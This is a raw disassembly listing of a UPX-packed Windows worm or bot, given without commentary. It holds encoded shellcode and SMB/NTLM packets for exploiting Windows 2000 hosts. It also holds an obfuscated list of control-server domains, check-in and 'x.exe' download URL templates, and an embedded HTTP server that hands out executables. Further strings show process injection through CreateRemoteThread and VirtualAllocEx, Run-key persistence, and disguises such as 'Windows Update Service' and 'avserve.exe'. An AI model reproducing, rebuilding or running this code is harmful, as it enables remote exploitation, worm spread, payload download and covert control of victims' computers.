		dd 314241h, 31424130h, 2E767663h, 7572h, 2E777777h, 6C646572h
		dd 2E656E69h, 7572h, 656C6966h,	72616573h, 722E6863h, 75h
		dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
		dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
		dd 782D7265h, 6D6F632Eh, 0
		dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
		dd 76h,	74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
		dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
		dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
		dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
		dd 75722E6Bh, 0
dword_314241D4	dd 72617778h, 6A632E65h, 656E2E62h, 74h	; DATA XREF: UPX0:31424086o
dword_314241E4	dd 617A616Dh, 616B6166h, 75722Eh ; DATA	XREF: UPX0:off_31424081o
dword_314241F0	dd 6578652Eh, 0		; DATA XREF: sub_314211A0+75o
					; sub_3142207E+55o ...
dword_314241F8	dd 5Ch			; DATA XREF: sub_314211A0+49o
					; sub_31422A9B+56o
aMozilla4_0Comp	db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
					; DATA XREF: sub_314211A0+13o
		align 10h
aAbcdefghijkl_0	db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31421316+1Co
		align 4
aAbcdefghijklmn	db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31421316+Co
		align 4
aZer0		db 'zer0',0             ; DATA XREF: sub_31421422+34o
		align 10h
aHttpS		db 'http://%s',0        ; DATA XREF: sub_314215C7+71o
		align 4
aHttpSIndex_php	db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=19-2&cnt=%s',0
					; DATA XREF: sub_314215C7+57o
		align 8
byte_314242B8	db 0EBh			; DATA XREF: sub_31421801+24Eo
					; sub_31421801+260o ...
		db 58h
word_314242BA	dw 7468h		; DATA XREF: sub_31422712+40o
		dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
		dd 6578652Eh, 4	dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
		dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
		dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h,	0DAE80AEBh
		dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
		dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
		dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h,	0C999C999h
		dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
		dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
		dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
		dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
		dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
		dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h,	99C99998h
		dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h,	98F3C8C8h
		dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
		dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
		dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
		dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
		dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
		dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h,	2C66C096h
		dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
		dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h,	26F434C9h
		dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
		dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h,	0B7C999C9h
		dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6	dup(99C999C9h)
		dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
		dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h,	83639D90h
		dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
		dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
		dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah,	9BAB9E59h
		dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
		dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
		dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
		dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
		dd 0
dword_31424580	dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
					; DATA XREF: sub_31421801+186o
		dd 0FEFF0000h, 0
		dd 2006200h
aPcNetworkProgr	db 'PC NETWORK PROGRAM 1.0',0
		db 2
		db  4Ch	; L
		db 41h,	4Eh, 4Dh
		db  41h	; A
		db 4Eh,	31h, 2Eh
		db  30h	; 0
		align 2
		dw 5702h
aIndowsForWorkg	db 'indows for Workgroups 3.1a',0
		db 2
		dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
		dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_3142460C	dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_31421801+1BAo
		dd 0FEFF0000h, 100000h,	0A400FF0Ch, 0A110400h, 0
		dd 20000000h, 0
		dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
		dd 4 dup(0)
aWindows2000219:
		unicode	0, <Windows 2000 2195>,0
aWindows20005_0:
		unicode	0, <Windows 2000 5.0>,0
		align 8
dword_314246B8	dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_31421801+1EEo
		dd 0FEFF0000h, 200800h,	0DA00FF0Ch, 0A110400h, 0
		dd 57000000h, 0
		dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
		dd 0
		dd 47000000h, 0
		dd 40000000h, 0
		dd 40000000h, 6000000h,	40000600h, 10000000h, 47001000h
		dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
		dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
		dd 320020h, 300030h, 200030h, 310032h, 350039h,	570000h
		dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h,	200030h
		dd 2E0035h, 30h, 0
dword_31424798	dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_31421801+8Do
		dd 0FEFF0000h, 300800h,	5C00FF04h, 1000800h, 3100h, 5C005Ch
		dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h,	310032h
		dd 5C0030h, 500049h
aC:					; DATA XREF: sub_31421801+BFo
		unicode	0, <C$>,0
a?????		db '?????',0
		dd 0
dword_314247FC	dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_31421801+2D4o
		dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h,	0
		dd 2019Fh, 3 dup(0)
		dd 3, 1, 40h, 2, 1103h,	6C005Ch, 610073h, 700072h, 63h
		dd 0
dword_31424868	dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_31421801+308o
		dd 4DC0800h, 500800h, 48000010h, 0
		dd 4, 2	dup(0)
		dd 48005400h, 2005400h,	2600h, 10005940h, 50005Ch, 500049h
		dd 5C0045h, 0
		dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
		dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh,	0F52ED94Fh
		dd 0
		dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_3142490C	dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_31421801+4EEo
		dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
		dd 0A0005400h, 200540Ch, 2600h,	100CB140h, 50005Ch, 500049h
		dd 5C0045h, 0
		dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
		dd 3ECh, 0
dword_3142498C	dd 401495h, 3, 40707Ch,	1, 0 ; DATA XREF: sub_31421801+51Co
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 40707Ch, 1, 0
		dd 1, 0
		dd 40707Ch, 1, 0
		dd 1, 0
		dd 40707Ch, 1, 0
		dd 1, 0
		dd 138578h, 0E9A65BABh,	0
dword_31424A20	dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_31421801+347o
		dd 0FEFF0800h, 600800h,	0DE00FF0Eh, 4000DEh, 0FF000000h
		dd 8FFFFFFh, 10B800h, 4010B800h, 0
		dd 0EE10B900h, 1000005h, 10h, 10B8h, 1,	200Ch, 90000h
		dd 0DADh, 0
		dd 0DADh, 0
dword_31424A8C	dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_31421801+372o
		dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
		dd 84005400h, 200540Fh,	2600h, 0F9540h,	50005Ch, 500049h
		dd 5C0045h, 0
		dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31424B00	dd 0			; DATA XREF: sub_31421801+3A0o
		dd 40A89Ah, 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 40A89Ah, 1, 0
		dd 1, 0
		dd 40A89Ah, 1, 0
		dd 1, 0
		dd 40A89Ah, 1, 0
		dd 1, 3	dup(0)
		dd 586E6957h, 72502050h, 6Fh, 9	dup(0)
		db 2 dup(0)
dword_31424BBE	dd 1004600h		; DATA XREF: sub_31421801+289r
		dw 1
		dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31424BF8	dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
					; DATA XREF: sub_31421801+41Bo
					; sub_31421801+45Do
		dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------


loc_31424C70:				; DATA XREF: sub_31421801+44Ao
		jmp	short loc_31424C78
; ---------------------------------------------------------------------------
		jmp	short loc_31424C7A
; ---------------------------------------------------------------------------
		align 8


loc_31424C78:				; CODE XREF: UPX0:loc_31424C70j
					; DATA XREF: sub_31421801+5Co
		pop	esp
		pop	esp


loc_31424C7A:				; CODE XREF: UPX0:31424C72j
		and	eax, 70695C73h
		arpl	[eax+eax], sp
; ---------------------------------------------------------------------------
		dw 0
dword_31424C84	dd 1CEC8166h		; DATA XREF: sub_31421801+Dr
dword_31424C88	dd 0E4FF07h		; DATA XREF: sub_31421801+1Cr
aSedebugprivile	db 'SeDebugPrivilege',0 ; DATA XREF: sub_31421D68+62o
		align 10h
aAdjusttokenpri	db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31421D68+39o
		align 4
aLookupprivileg	db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31421D68+2Ao
		align 10h
aOpenprocesstok	db 'OpenProcessToken',0 ; DATA XREF: sub_31421D68+1Bo
		align 4
aAdvapi32	db 'advapi32',0         ; DATA XREF: sub_31421D68+8o
					; sub_314223B2+12Co
		align 10h
aUterm192	db 'uterm19-2',0        ; DATA XREF: sub_31421DF0:loc_31421ED5o
					; UPX0:31422351o ...
		align 4
aShell_traywnd	db 'Shell_TrayWnd',0    ; DATA XREF: sub_31421DF0+58o
		align 4
aCreateremoteth	db 'CreateRemoteThread',0 ; DATA XREF: sub_31421DF0:loc_31421E37o
		align 10h
aVirtualallocex	db 'VirtualAllocEx',0   ; DATA XREF: sub_31421DF0+34o
		align 10h
aKernel32	db 'kernel32',0         ; DATA XREF: sub_31421DF0+18o
		align 4
dword_31424D3C	dd 0E9F3F5h		; DATA XREF: sub_3142207E+112o
aHttp1_1200Ok	db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+106o
		db 0Dh,0Ah
		db 0Dh,0Ah,0
		align 4
aContentLengthU	db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3142207E+85o
		db 0Dh,0Ah,0
		align 10h
aHttp1_1200OkCo	db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+71o
		db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
		align 10h
aGet		db 'GET',0              ; DATA XREF: sub_3142207E+3Do
aFtpupd_exe	db 'ftpupd.exe',0       ; DATA XREF: UPX0:3142233Co
		align 10h
aUser32		db 'user32',0           ; DATA XREF: sub_314223B2+133o
		align 4
aMsvcrt		db 'msvcrt',0           ; DATA XREF: sub_314223B2+125o
		align 10h
aWininet	db 'wininet',0          ; DATA XREF: sub_314223B2+11Eo
aWs2_32		db 'ws2_32',0           ; DATA XREF: sub_314223B2+111o
		align 10h
aU192x		db 'u19-2x',0           ; DATA XREF: sub_314223B2+BDo
		align 4
aU19		db 'u19',0              ; DATA XREF: sub_314223B2+B6o
aU18		db 'u18',0              ; DATA XREF: sub_314223B2+AFo
aU17		db 'u17',0              ; DATA XREF: sub_314223B2+A8o
aU16		db 'u16',0              ; DATA XREF: sub_314223B2+A1o
aU15		db 'u15',0              ; DATA XREF: sub_314223B2+9Ao
aU14		db 'u14',0              ; DATA XREF: sub_314223B2+93o
aU13i		db 'u13i',0             ; DATA XREF: sub_314223B2+8Co
		align 4
aU13		db 'u13',0              ; DATA XREF: sub_314223B2+85o
aU12		db 'u12',0              ; DATA XREF: sub_314223B2+7Eo
aU11		db 'u11',0              ; DATA XREF: sub_314223B2+77o
aU10		db 'u10',0              ; DATA XREF: sub_314223B2+70o
aU9		db 'u9',0               ; DATA XREF: sub_314223B2+69o
		align 4
aU8		db 'u8',0               ; DATA XREF: sub_314223B2+62o
		align 10h
aU18x		db 'u18x',0             ; DATA XREF: sub_314223B2+5Bo
		align 4
aU17x		db 'u17x',0             ; DATA XREF: sub_314223B2+54o
		align 10h
aU16x		db 'u16x',0             ; DATA XREF: sub_314223B2+4Do
		align 4
aU15x		db 'u15x',0             ; DATA XREF: sub_314223B2+46o
		align 10h
aU14x		db 'u14x',0             ; DATA XREF: sub_314223B2+3Fo
		align 4
aU13x		db 'u13x',0             ; DATA XREF: sub_314223B2+38o
		align 10h
aU12x		db 'u12x',0             ; DATA XREF: sub_314223B2+31o
		align 4
aU11x		db 'u11x',0             ; DATA XREF: sub_314223B2+2Ao
		align 10h
aU10x		db 'u10x',0             ; DATA XREF: sub_314223B2+23o
		align 4
aHttpSDX_exe	db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31422712+2Do
		align 4
aSoftwareMicros	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_314221C4+23o
					; sub_314229E6+66o ...
		align 4
aCryptographicS	db 'Cryptographic Service',0 ; DATA XREF: sub_314221C4+1Co
					; sub_31422A9B+87o ...
		align 4
aKjszoscitbkggy	db 'kjszoscitbkggyijpu',0 ; DATA XREF: sub_314215C7+4Fo
					; sub_31422B67+57o ...
		align 4
		dd 0
aSoftwareMicr_0	db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31422B67+32o
aClient		db 'Client',0           ; DATA XREF: sub_31422B67+BCo
					; sub_31422B67+F8o
		align 10h
aId		db 'ID',0               ; DATA XREF: sub_31422B67+37o
					; sub_31422B67+75o
		align 4
aWindowsUpdate	db 'Windows Update',0   ; DATA XREF: sub_314229E6+55o
		align 4
aMsConfigV13	db 'MS Config v13',0    ; DATA XREF: sub_314229E6+4Eo
		align 4
aAvserve2_exeup	db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_314229E6+47o
		align 10h
aAvserve_exe	db 'avserve.exe',0      ; DATA XREF: sub_314229E6+40o
aWindowsUpdateS	db 'Windows Update Service',0 ; DATA XREF: sub_314229E6+39o
		align 4
aWinupdate	db 'WinUpdate',0        ; DATA XREF: sub_314229E6+32o
		align 10h
aSystray	db 'SysTray',0          ; DATA XREF: sub_314229E6+2Bo
aBotLoader	db 'Bot Loader',0       ; DATA XREF: sub_314229E6+24o
		align 4
aSystemRestoreS	db 'System Restore Service',0 ; DATA XREF: sub_314229E6+1Do
		align 4
aDiskDefragment	db 'Disk Defragmenter',0 ; DATA XREF: sub_314229E6+16o
		align 10h
aWindowsSecurit	db 'Windows Security Manager',0 ; DATA XREF: sub_314229E6+Fo
		align 4
a1:					; DATA XREF: sub_31422B67+B7o
		unicode	0, <1>,0
		dd 6 dup(0)
dword_31424FE8	dd 0			; DATA XREF: sub_3142207E+C7r
					; sub_314221C4+80w
dword_31424FEC	dd 0			; DATA XREF: sub_314215C7+43r
					; sub_314216A2+53o ...
dword_31424FF0	dd 0			; DATA XREF: sub_3142207E+79r
					; sub_3142207E:loc_3142212Cr ...
dword_31424FF4	dd 44h			; DATA XREF: sub_31421DF0+C2r
					; UPX0:3142235Cw ...
dword_31424FF8	dd 0			; DATA XREF: sub_3142239E+2r
					; sub_314223B2+CEw
dword_31424FFC	dd 0			; DATA XREF: sub_314221C4+E0w
					; sub_31422712+20r
dword_31425000	dd 31420000h		; DATA XREF: sub_31421DF0+6r
					; UPX0:31422341w
dword_31425004	dd 0			; DATA XREF: sub_314215C7+49r
					; sub_314216A2+4Ao ...
dword_31425008	dd 0			; DATA XREF: UPX0:314227AFw
					; UPX0:314227C1w
word_3142500C	dw 0			; DATA XREF: sub_3142255F+3Br
					; sub_314225C3:loc_31422624r ...
		align 10h
dword_31425010	dd 0			; DATA XREF: sub_31422B67+25w
					; sub_31422B67+110w
		align 1000h
UPX0		ends

; Section 2. (virtual address 00006000)
; Virtual size			: 00002000 (   8192.)
; Section size in file		: 00002000 (   8192.)
; Offset to raw	data for section: 00006000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
UPX1		segment	para public 'CODE' use32
		assume cs:UPX1
		;org 31426000h
		assume es:nothing, ss:nothing, ds:UPX0,	fs:nothing, gs:nothing
dword_31426000	dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
					; DATA XREF: UPX1:31427BB1o
		dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
		dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
		dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
		dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
		dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
		dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
		dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
		dd 70637274h, 1004179h,	61657243h, 76456574h, 41746E65h
		dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
		dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
		dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
		dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
		dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
		dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
		dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h
		dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h
		dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h
		dd 65636F72h, 1007373h,	50746547h, 41636F72h, 65726464h
		dd 1007373h, 64616F4Ch,	7262694Ch, 41797261h, 72570100h
		dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h
		dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h
		dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h
		dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h
		dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h
		dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h
		dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h
		dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h
		dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
		dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h
		dd 72457473h, 726F72h, 0D100h, 0
		dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
		dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
		dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
		dd 4579654Bh, 1004178h,	44676552h, 74656C65h, 6C615665h
		dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
		dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
		dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
		dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
		dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
		dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
		dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
		dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
		dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
		dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
		dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
		dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
		dd 337265h, 72747301h, 727473h,	72747301h, 726863h, 0E900h
		dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h
		dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh
		dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
		dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h
		dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
		dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh
		dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
		dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
		dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
		dd 10000h, 13C00h, 73FF00h, 0FF0002FFh,	1FF000Dh, 39FF00h
		dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h
		dd 10FF00h, 0FF0016FFh,	3, 50000000h, 4C000045h, 0DC000201h
		dd 40DD34h, 0
		dd 0E0000000h, 0B010F00h, 601h,	26h, 12h, 34000000h, 23h
		dd 10h,	40h, 314200h, 10h, 4000002h, 0
		dd 4000000h, 2 dup(0)
		dd 60h,	4, 2000000h, 0
		dd 1000h, 10h, 1000h, 10h, 10000000h, 2	dup(0)
		dd 34000000h, 8C00002Dh, 15h dup(0)
		dd 7C000010h, 1, 5 dup(0)
		dd 2E000000h, 74786574h, 56000000h, 24h, 10h, 26h, 4, 2	dup(0)
		dd 20000000h, 2EE00400h, 61746164h, 14000000h, 10h, 40h
		dd 10h,	2Ah, 2 dup(0)
		dd 40000000h, 0C00000h,	3C000050h, 0C300002Fh, 0A1000054h
		dd 89254BBEh, 0DB43AA85h, 0AEF070A0h, 92A2047Dh, 4EC00F3Ch
		dd 27BE81Ch, 8402F26Ah,	47FC7D1Bh, 0F0024A19h, 0A033E402h
		dd 2164868h, 0D2B735D7h, 0A73D7D03h, 769F6801h,	36E6CCE6h
		dd 3A4A2064h, 1B5AB7CCh, 0DC87B734h, 6A7684E0h,	96F42A70h
		dd 0E6C8E38Ch, 5EC86080h, 7A97640Ah, 273E1B25h,	0A2280084h
		dd 364B003Fh, 3CD9B96Bh, 98B9B26Ch, 0E477BDE2h,	0DC016754h
		dd 317E500Fh, 0C777C3E4h, 0AC683B0Dh, 0D328C00Dh, 0B138CEDCh
		dd 0E56F08C9h, 0DB0C7A04h, 0D2484522h, 0DD2DC5F8h, 0D61B212Fh
		dd 402EDB1Ch, 67012DEh,	4C9039ECh, 40BCF844h, 0C27190D6h
		dd 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh, 67E9ACF9h
		dd 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h,	1CF25B07h
		dd 96F41276h, 899DE9C3h, 940AEF65h, 7BC87C6Ah, 64B1E3C3h
		dd 0C9BE490Ch, 991DD97Bh, 90E154E4h, 8C9FE924h,	0DCCCC349h
		dd 0CF78242Eh, 2C8248EDh, 0F864052Ch, 66F4150Ch, 3319A002h
		dd 8707A23h, 8F895E74h,	0F4C6DD0Eh, 1C51CC5Fh, 80B3EF9Ch
		dd 7F24E4A1h, 5A435A8h,	0B5D0781Bh, 571282F8h, 5A745737h
		dd 0ACBF931h, 74F80E14h, 9A0684Bh, 0CA28B753h, 2D3D74CEh
		dd 67ED85C9h, 0A0412069h, 0FFC55FFh, 35BAB9E8h,	50E49ED7h
		dd 0E9628ACh, 5B3002F0h, 5547BF4Dh, 8C0009F8h, 681583E4h
		dd 0F475583Bh, 1887EE42h, 851321C5h, 0A90A508Bh, 0BFF77FB6h
		dd 3C418B2Fh, 68C10357h, 488B4D30h, 50788B34h, 0A0F44D89h
		dd 8D7031B4h, 1BDBD84Bh, 0CD5285D8h, 1F0F552h, 0EC7047D2h
		dd 0EC1265F1h, 0D790ED74h, 9ABD1110h, 0E82636Ch, 5D231409h
		dd 0F11BE164h, 5051F84Dh, 68971818h, 8B1B1528h,	5DB0892Ah
		dd 58D1B040h, 6B03CA3Ah, 5E30EB34h, 193B5BB5h, 0F05559ABh
		dd 52EA037Dh, 45E626B7h, 3151F03Eh, 3DC25350h, 0AC1ED9F1h
		dd 0D6BDF435h, 3C4FFAFAh, 0D06A1778h, 3BEC5577h, 5F0574C7h
		dd 589B56B9h, 8CBF1BEBh, 0B9CD2534h, 0E5985CDh,	7EB05FCh
		dd 0A1EF7408h, 5817D487h, 51515FFCh, 6468512Fh,	310F60B8h
		dd 0D00D5C69h, 252C8836h, 0B1AFDDB8h, 0AEBAC44Ch, 0FECB213h
		dd 71C22D59h, 0F9EBA67Bh, 3CBCB66Ah, 35500C80h,	0A82C49DDh
		dd 2C507D50h, 91165DC0h, 2019852Eh, 0A971437Ch,	8B577F16h
		dd 0D214247Ch, 0FD177E11h, 8760CFFFh, 61C2801Ah, 461E1488h
		dd 0E97CF73Bh, 3B2480h,	593575B6h, 448B548Ch, 65A5F2Eh
		dd 0ACF19D0Ch, 66DB5657h, 0BB622F21h, 0DC73074Bh, 501950F0h
		dd 4D000056h, 0ACAA25B8h, 0DBC49577h, 4DF0E3DAh, 0FA6849F4h
		dd 65FFF00Ch, 0C7A326DAh, 0CC343408h, 7B666B2Ah, 754C2EB2h
		dd 0BC500A0Ah, 0E84F8520h, 54181A5Ch, 7FB807C6h, 5F6B7C3Bh
		dd 40740180h, 1008B0Ch,	448D5108h, 0B166D824h, 30215F73h
		dd 5903D311h, 4D3E13BAh, 0CC150724h, 0C82007BBh, 1D0CF1FEh
		dd 0C8E4332Fh, 10E7C1F8h, 0D9919E6Ch, 0B60B85h,	915D8B02h
		dd 12351C09h, 4001F333h, 0C2C03AB2h, 0CFC653C4h, 0E3676D5Eh
		dd 5035F211h, 0B4B06825h, 831C0135h, 33ADE748h,	0B5ECF203h
		dd 9541F017h, 7568CC35h, 3D986866h, 6C58B7A3h, 0F0446EC6h
		dd 58FE474Fh, 0B31A54Dh, 0DA141B37h, 0EEBF0354h, 34007C74h
		dd 0B933A1h, 0BAEDDB79h, 3BC72B7Fh, 8B0272C1h, 292BE1C1h
		dd 318E8A1h, 0BF8923C7h, 0CCACDCA5h, 1172233Dh,	0A36786Ah
		dd 40F868CFh, 0E113C4EBh, 5B3D9350h, 0D411778Ch, 5815941Eh
		dd 68C9BB93h, 68030B40h, 6759973Ch, 3A3CB36Dh, 52535453h
		dd 8FA311F8h, 9824D083h, 4DB04C2h, 30232C66h, 0B1F70E64h
		dd 60B0C0B5h, 4EE808D0h, 3A95D0DDh, 6806C8EEh, 1D898068h
		dd 0EEDB6897h, 7E182784h, 0D4C014ECh, 0DB3000F2h, 539153DAh
		dd 3A01027Bh, 4D26B51Ah, 0FD7780EBh, 39ACD28Dh,	2F741A4Dh
		dd 1D59DECDh, 0CA3DC9Eh, 0B6FEA365h, 0A49784C6h, 565153FCh
		dd 37D83A86h, 6874B623h, 5EF92656h, 0FBE369Ah, 10C25819h
		dd 56C05E05h, 8499A5E9h, 89E80C4Bh, 0D80DEC5Dh,	53BFB7Dh
		dd 1FFF25FFh, 0A3C33A04h, 0E77443FCh, 37FA126Fh, 84CC8A1Fh
